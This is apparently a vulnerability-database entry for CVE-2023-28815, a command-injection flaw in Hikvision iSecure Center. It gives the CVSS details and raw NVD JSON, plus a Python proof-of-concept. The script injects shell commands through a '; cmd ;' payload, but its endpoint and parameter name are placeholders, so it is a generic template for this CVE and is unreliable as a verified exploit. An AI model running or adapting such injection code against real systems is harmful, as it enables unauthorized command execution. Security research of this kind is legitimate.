Security Vulnerability Report
CVE-2023-28815 CVSS 9.8 CRITICAL

Published: 2025-10-17 12:15:37
Last Modified: 2026-04-15 00:35:42

Description

Some versions of Hikvision's iSecure Center product contain insufficient parameter validation, resulting in a command injection vulnerability. Attackers may exploit this to gain platform privileges and execute arbitrary commands on the system. iSecure Center is software released for China's domestic market only, with no overseas release.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Hikvision iSecure Center < fixed version (for the specific version number, refer to Hikvision's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-28815 - Hikvision iSecure Center Command Injection PoC
# Vulnerability: Insufficient parameter validation leading to command injection
# CVSS: 9.8 (Critical)
import requests
import sys

TARGET_URL = "http://target-host:port"


# The vulnerable endpoint typically accepts parameters that are passed to system commands
# without proper sanitization
def exploit(target_url, cmd):
    """
    Exploit the command injection vulnerability in Hikvision iSecure Center.
    The vulnerability exists due to insufficient parameter validation,
    allowing attackers to inject arbitrary OS commands.
    """
    # Example injection payload using command separator
    # The vulnerable parameter is typically processed in a system() or exec() call
    payload = f"; {cmd} ;"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0",
    }
    # Adjust the endpoint and parameter name based on the specific vulnerable version
    endpoint = f"{target_url}/svm/api/v1/..."  # Example endpoint placeholder
    data = {
        "param1": payload,  # Replace with actual vulnerable parameter name
    }
    try:
        response = requests.post(endpoint, data=data, headers=headers, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        return response
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def check_vulnerability(target_url):
    """Check if the target is vulnerable by injecting a benign command."""
    # Use time-based detection or echo-based detection
    test_cmd = "echo VULNERABLE_CVE_2023_28815"
    response = exploit(target_url, test_cmd)
    if response and "VULNERABLE_CVE_2023_28815" in response.text:
        print("[+] Target is VULNERABLE to CVE-2023-28815")
        return True
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [command]")
        print(f"Example: {sys.argv[0]} http://192.168.1.100:8080 'whoami'")
        sys.exit(1)
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else "whoami"
    if check_vulnerability(target):
        print(f"[*] Executing command: {command}")
        exploit(target, command)

References

https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/2023-04/ (Hikvision Security Notice, 2023-04)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-28815", "sourceIdentifier": "[email protected]", "published": "2025-10-17T12:15:37.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Some versions of Hikvision's iSecure Center Product contain insufficient parameter validation, resulting in a command injection vulnerability. Attackers may exploit this to gain platform privileges and execute arbitrary commands on the system.iSecure Center is software released for China's domestic market only, with no overseas release."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-141"}]}], "references": [{"url": "https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/2023-04/", "source": "[email protected]"}]}}